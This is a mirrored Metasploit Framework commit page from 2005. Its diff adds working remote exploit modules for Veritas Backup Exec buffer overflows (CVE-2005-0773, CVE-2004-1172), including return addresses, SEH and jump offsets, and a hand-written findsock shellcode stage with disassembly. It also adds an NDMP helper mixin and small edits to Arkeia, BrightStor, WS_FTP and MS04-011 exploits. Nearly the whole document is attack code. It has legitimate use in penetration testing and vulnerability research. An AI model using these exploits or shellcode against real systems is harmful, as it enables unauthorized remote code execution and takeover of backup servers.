infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Bug fixes for alphanum vs alphanumeric 

Added some target print code to the brightstor explotis
Added the backupexec epxloits


git-svn-id: file:///home/svn/incoming/trunk@3132 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-27 01:51:50 +00:00
parent af19802cc0
commit 7624b4d78a
14 changed files with 419 additions and 526 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

272
dev/porting/queue/backupexec_agent.rb
View File

@ -1,272 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH
pointer.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
[ 'MIL', '9'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::backupexec_agent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10000],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Veritas BackupExec Windows
Agent software. This vulnerability occurs when a client authentication request
is received with type '3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH pointer.
}),
'Refs' =>
[
['CVE', '2005-0773' ],
['URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
['URL', 'http://seer.support.veritas.com/docs/276604.htm' ],
['MIL', '9'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Veritas BE 9.0/9.1/10.0 (All Windows)', 0x0140f8d5, 0x014261b0 ],
['Veritas BE 9.0/9.1/10.0 (Windows 2000)', 0x75022ac4, 0x75022ac4 ],
],
'Keys' => ['veritas'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
# Version 4.2 -> 9.1
# Version 5.1 -> 10.0
sub Check {
my $self = shift;
my ($vend, $prod, $vers) = $self->GetVersion;
if (! $vend) {
$self->PrintLine("[*] Could not determine the version number");
return $self->CheckCode('Unknown');
}
$self->PrintLine("[*] $prod Version $vers ($vend)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $res = $s->Recv(4, 5);
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
my $username = "X" x 512;
my $password = Pex::Text::PatternCreate(8192);
# Place our payload early in the request and jump backwards into it
substr($password, 3536-length($shellcode), length($shellcode), $shellcode);
# This offset is required for version 10.0
substr($password, 3536, 2, "\xeb\x06");
substr($password, 3540, 4, pack('V', $target->[2]) );
substr($password, 3544, 5, "\xe9" . pack('V', -1037));
# This offset is required for version 9.0/9.1
substr($password, 4524, 2, "\xeb\x06");
substr($password, 4528, 4, pack('V', $target->[1]) );
substr($password, 4532, 5, "\xe9" . pack('V', -2025));
my $conn_auth =
pack('N', 1). # Sequence number
pack('N', time()). # Current time
pack('N', 0). # Message type (request)
pack('N', 0x901). # Message name (connect_client_auth)
pack('N', 0). # Reply sequence number
pack('N', 0). # Error status
pack('N', 3). # Authentication type
pack('N', length($username)).
$username.
pack('N', length($password)).
$password.
pack('N', 4);
$self->PrintLine( "[*] Sending authentication request of " . length($conn_auth) . " bytes..." );
$s->Send(pack('N', 0x80000000 + length($conn_auth)) . $conn_auth);
return;
}
sub GetVersion {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return undef;
}
my $res = $s->Recv(4, 5);
return undef if ! $res;
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
my $serv_info =
pack('N', 1). # Sequence number
pack('N', time()). # Current time
pack('N', 0). # Message type (request)
pack('N', 0x108). # Message name (connect_client_auth)
pack('N', 0). # Reply sequence number
pack('N', 0); # Error status
$s->Send(pack('N', 0x80000000 + length($serv_info)) . $serv_info);
$res = $s->Recv(4, 5);
return undef if ! $res;
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
$s->Close;
# Skip past the protocols headers
$res = substr($res, 28);
# Vendor
my $vend_len = unpack('N', substr($res, 0, 4));
my $vend = substr($res, 4, $vend_len);
$res = substr($res, 4 + $vend_len + 1);
# Product
my $prod_len = unpack('N', substr($res, 0, 4));
my $prod = substr($res, 4, $prod_len);
$res = substr($res, 4 + $prod_len + 1);
# Version
my $vers_len = unpack('N', substr($res, 0, 4));
my $vers = substr($res, 4, $vers_len);
$res = substr($res, 4 + $vers_len + 1);
return ($vend, $prod, $vers);
}
1;
=end
end
end

243
dev/porting/queue/backupexec_ns.rb
View File

@ -1,243 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the Veritas Backup
Exec Agent Browser service. This vulnerability occurs when a
recv() call has a length value too long for the destination
stack buffer. By sending an agent name value of 63 bytes or
more, we can overwrite the return address of the recv
function. Since we only have ~60 bytes of contiguous space
for shellcode, a tiny findsock payload is sent which uses a
hardcoded IAT address for the recv() function. This payload
will then roll the stack back to the beginning of the page,
recv() the real shellcode into it, and jump to it. This
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
8.6.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12418'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'MinNops' => 512,
'MinNops' => 512,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Dec 16 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::backupexec_ns;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6101],
},
'Payload' =>
{
'MinNops' => 512,
'MaxNops' => 512,
'Space' => 1024,
'BadChars' => '',
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Veritas Backup Exec
Agent Browser service. This vulnerability occurs when a recv() call
has a length value too long for the destination stack buffer. By
sending an agent name value of 63 bytes or more, we can overwrite
the return address of the recv function. Since we only have ~60
bytes of contiguous space for shellcode, a tiny findsock payload
is sent which uses a hardcoded IAT address for the recv() function.
This payload will then roll the stack back to the beginning of
the page, recv() the real shellcode into it, and jump to it.
This module has been tested against Veritas 9.1 SP0, 9.1 SP1,
and 8.6.
}),
'Refs' =>
[
['OSVDB', '12418'],
['CVE', '2004-1172'],
['URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
['MIL', '10'],
],
'Targets' =>
[ # BackupExec 9.1 SP0/SP1 return contributed by class101
['Veritas BE 9.1 SP0/SP1', 0x0142ffa1, 0x401150FF], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
],
'Keys' => ['veritas'],
'DisclosureDate' => 'Dec 16 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $code = "\xfc" x 112;
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
# nulls: [0x00401150 -> 0x401150FF]
my $read =
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74".
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11".
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75".
"\xe1\xff\xd7";
# Configure the IAT for the recv call
substr($read, 29, 4, pack('V', $target->[2]));
# Stuff it all into the request...
substr( $code, 2, length($read), $read );
# Return address to use (jmp esi)
substr( $code, 66, 4, pack('V', $target->[1]) );
# The registration request
my $req =
"\x02\x00\x32\x00\x20\x00" . $code . "\x00".
"1.1.1.1.1.1\x00".
"\xeb\x81";
$self->PrintLine( "[*] Sending agent registration request of " . length($req) . " bytes..." );
$s->Send($req);
$self->PrintLine( "[*] Sending final payload of " . length($req) . " bytes..." );
$s->Send($shellcode);
sleep(2);
$self->PrintLine("[*] Waiting for a response...");
return;
}
my $findsock = q{
00000000 31F6 xor esi,esi
00000002 C1EC0C shr esp,0xc
00000005 C1E40C shl esp,0xc
00000008 89E7 mov edi,esp
0000000A 89FB mov ebx,edi
0000000C 6A01 push byte +0x1
0000000E 8B7424FE mov esi,[esp-0x2]
00000012 31D2 xor edx,edx
00000014 52 push edx
00000015 42 inc edx
00000016 C1E210 shl edx,0x10
00000019 52 push edx
0000001A 57 push edi
0000001B 56 push esi
0000001C B8FF501140 mov eax,0x401150ff
00000021 C1E808 shr eax,0x8
00000024 FF10 call near [eax]
00000026 85C0 test eax,eax
00000028 7907 jns 0x31
0000002A 89DC mov esp,ebx
0000002C 4E dec esi
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12
00000031 FFD7 call edi
};
1;
=end
end
end

3
lib/msf/core/exploit.rb
View File

@ -213,7 +213,8 @@ class Exploit < Msf::Module
require 'msf/core/exploit/dcerpc'
require 'msf/core/exploit/mssql'
require 'msf/core/exploit/arkeia'
require 'msf/core/exploit/ndmp'
#
# Creates an instance of the exploit module. Mad skillz.
#

29
lib/msf/core/exploit/arkeia.rb
View File

@ -28,6 +28,14 @@ module Exploit::Remote::Arkeia
end
#
# Flush the receive buffer on a new connection
#
def connect
super
self.recv_buff = ''
end
#
# This method dumps some information about the service
#
@ -38,7 +46,8 @@ module Exploit::Remote::Arkeia
resp = ''
# Authenticate1
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
req =
"\x00\x41\x00\x00\x00\x00\x00\x73"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
@ -63,7 +72,8 @@ module Exploit::Remote::Arkeia
end
# Authenticate2
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
req =
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
"\x32\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00"
@ -75,7 +85,8 @@ module Exploit::Remote::Arkeia
end
# SessionSetup1
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
req =
"\x00\x61\x00\x04\x00\x01\x00\x15"+
"\x00\x00\x31\x35\x33\x39\x38\x00"+
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
@ -88,7 +99,8 @@ module Exploit::Remote::Arkeia
end
# Begin the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
req =
"\x00\x62\x00\x01\x00\x02\x00\x25"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
@ -103,7 +115,8 @@ module Exploit::Remote::Arkeia
end
# Complete the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x32\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
@ -129,7 +142,8 @@ module Exploit::Remote::Arkeia
info['Hostname'] = mver[1] if mver
# Begin the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
req =
"\x00\x62\x00\x01\x00\x02\x00\x26"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
@ -148,7 +162,8 @@ module Exploit::Remote::Arkeia
end
# Complete the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x33\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"

118
lib/msf/core/exploit/ndmp.rb Normal file
View File

@ -0,0 +1,118 @@
require 'msf/core'
module Msf
###
#
# This module exposes methods for accessing NDMP services
#
###
module Exploit::Remote::NDMP
include Exploit::Remote::Tcp
#
# Creates an instance of a MSSQL exploit module.
#
def initialize(info = {})
super
# Register the options that all FTP exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(10000),
], Msf::Exploit::Remote::NDMP)
self.recv_buff = ''
end
#
# Flush the receive buffer on a new connection
#
def connect
super
self.recv_buff = ''
end
#
# This method dumps ndmp version information
#
def ndmp_info
connect
req = [
1, # Sequence number
Time.now.to_i, # Current time
0, # Message type (request)
0x108, # Message name (version)
0, # Reply sequence number
0, # Error status
].pack('NNNNNN')
resp = ndmp_recv()
ndmp_send(req)
resp = ndmp_recv()
disconnect
if (not (resp and resp.length > 28))
return false
end
info = { }
i = 32
vend_len = resp[i, 4].unpack('N')[0]
vend = resp[i + 4, vend_len]
i += vend_len + 4 + 1
prod_len = resp[i, 4].unpack('N')[0]
prod = resp[i + 4, prod_len]
i += prod_len + 4 + 1
vers_len = resp[i, 4].unpack('N')[0]
vers = resp[i + 4, vers_len]
i += vers_len + 4 + 1
info['Version'] = vers
info['Product'] = prod
info['Vendor'] = vend
return info
end
#
# This method reads from the socket and parses out a single
# NDMP response, buffering the rest
#
def ndmp_recv(nsock = self.sock)
if (self.recv_buff.length < 4)
self.recv_buff << (sock.get_once || '')
end
if (self.recv_buff.length < 4)
return false
end
# Read the length header out of the message
dlen = self.recv_buff[0, 4].unpack('N')[0] & 0x7fffffff
# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 4)
return self.recv_buff.slice!(0, dlen + 4)
end
return false
end
#
# This method tacks a length header on a packet then sends
# it out the socket
#
def ndmp_send(data, nsock = self.sock)
nsock.put( [ data.length + 0x80000000 ].pack('N') + data )
end
attr_accessor :recv_buff
end
end

3
modules/exploits/windows/arkeia/arkeia_type77_win32.rb
View File

@ -81,6 +81,9 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
head[6, 2] = [data.length].pack('n')

126
modules/exploits/windows/backupexec/backupexec_agent.rb Normal file
View File

@ -0,0 +1,126 @@
require 'msf/core'
module Msf
class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::NDMP
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH
pointer.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
[ 'MIL', '9'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Veritas BE 9.0/9.1/10.0 (All Windows)',
{
'Platform' => 'win',
'Rets' => [ 0x0140f8d5, 0x014261b0 ],
},
],
[
'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
{
'Platform' => 'win',
'Rets' => [ 0x75022ac4, 0x75022ac4 ],
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000)
], self)
end
def check
info = ndmp_info()
if (info and info['Version'])
print_status(" Vendor: #{info['Vendor']}")
print_status("Product: #{info['Product']}")
print_status("Version: #{info['Version']}")
if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
resp = ndmp_recv()
username = 'X' * 512
password = Rex::Text.rand_text_alphanumeric(8192)
# Place our payload early in the request and jump backwards into it
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
# This offset is required for version 10.0
password[3536, 2] = "\xeb\x06"
password[3540, 4] = [ target['Rets'][1] ].pack('V')
password[3544, 5] = "\xe9" + [-1037].pack('V')
# This offset is required for version 9.0/9.1
password[4524, 2] = "\xeb\x06"
password[4528, 4] = [ target['Rets'][0] ].pack('V')
password[4532, 5] = "\xe9" + [-2025].pack('V')
# Create the authentication request
auth = [
1, # Sequence number
Time.now.to_i, # Current time
0, # Message type (request)
0x901, # Message name (connect_client_auth)
0, # Reply sequence number
0, # Error status
3 # Authentication type
].pack('NNNNNNN') +
[ username.length ].pack('N') + username +
[ password.length ].pack('N') + password +
[ 4 ].pack('N')
print_status("Sending authentication request...")
ndmp_send(auth)
handler
disconnect
end
end
end

137
modules/exploits/windows/backupexec/backupexec_ns.rb Normal file
View File

@ -0,0 +1,137 @@
require 'msf/core'
module Msf
class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the Veritas Backup
Exec Agent Browser service. This vulnerability occurs when a
recv() call has a length value too long for the destination
stack buffer. By sending an agent name value of 63 bytes or
more, we can overwrite the return address of the recv
function. Since we only have ~60 bytes of contiguous space
for shellcode, a tiny findsock payload is sent which uses a
hardcoded IAT address for the recv() function. This payload
will then roll the stack back to the beginning of the page,
recv() the real shellcode into it, and jump to it. This
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
8.6.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12418'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'MinNops' => 512,
'MinNops' => 512,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
{
'Platform' => 'win',
'Rets' => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
},
],
[
'Veritas BE 8.5',
{
'Platform' => 'win',
'Rets' => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
},
],
],
'DisclosureDate' => 'Dec 16 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6101)
], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
# nulls: [0x00401150 -> 0x401150FF]
stage_code = "\xfc" * 112
stage_read =
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
# Configure the IAT for the recv call
stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
# Stuff it all into one request
stage_code[2, stage_read.length] = stage_read
# Create the registration request
req =
"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
"1.1.1.1.1.1\x00" + "\xeb\x81"
print_status("Sending the agent registration request of #{req.length.to_s} bytes...")
sock.put(req)
print_status("Sending the payload stage down the socket...")
sock.put(payload.encoded)
print_status("Waiting for the payload to execute...")
select(nil, nil, nil, 2)
handler
disconnect
end
end
end
__END__
[ findsock stage ]
00000000 31F6 xor esi,esi
00000002 C1EC0C shr esp,0xc
00000005 C1E40C shl esp,0xc
00000008 89E7 mov edi,esp
0000000A 89FB mov ebx,edi
0000000C 6A01 push byte +0x1
0000000E 8B7424FE mov esi,[esp-0x2]
00000012 31D2 xor edx,edx
00000014 52 push edx
00000015 42 inc edx
00000016 C1E210 shl edx,0x10
00000019 52 push edx
0000001A 57 push edi
0000001B 56 push esi
0000001C B8FF501140 mov eax,0x401150ff
00000021 C1E808 shr eax,0x8
00000024 FF10 call near [eax]
00000026 85C0 test eax,eax
00000028 7907 jns 0x31
0000002A 89DC mov esp,ebx
0000002C 4E dec esi
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12
00000031 FFD7 call edi

2
modules/exploits/windows/brightstor/brightstor_disco_tcp.rb
View File

@ -95,6 +95,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(4096)
# Overwriting the return address works well, but the only register

2
modules/exploits/windows/brightstor/brightstor_disco_udp.rb
View File

@ -93,6 +93,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
def exploit
connect_udp
print_status("Trying target #{target.name}...")
buf = 'X' * 4096
# esp @ 971

2
modules/exploits/windows/brightstor/brightstor_sqlagent.rb
View File

@ -62,6 +62,8 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
def exploit
print_status("Trying target #{target.name}...")
# The 'one line' request does not work against Windows 2003
1.to(5) { |i|

4
modules/exploits/windows/brightstor/brightstor_uniagent.rb
View File

@ -72,7 +72,9 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
end
def exploit
print_status("Trying target #{target.name}...")
# The server reverses four bytes starting at offset 0xa5 :0
# Create the overflow string

2
modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
View File

@ -61,7 +61,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_alphanum(8192)
buf = Rex::Text.rand_text_alphanumeric(8192)
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
buf[514, 4] = [ target.ret ].pack('V')
buf[518, 4] = [ target.ret ].pack('V')

2
modules/exploits/windows/ssl/ms04_011_pct.rb
View File

@ -129,7 +129,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
if (datastore['PROTO'] == 'smtp')
greeting = sock.get_once
sock.put('HELO ' + (Rex::Text.rand_text_alphanum(rand(10)+1)) + "\r\n")
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
resp = sock.get_once
sock.put("STARTTLS\r\n")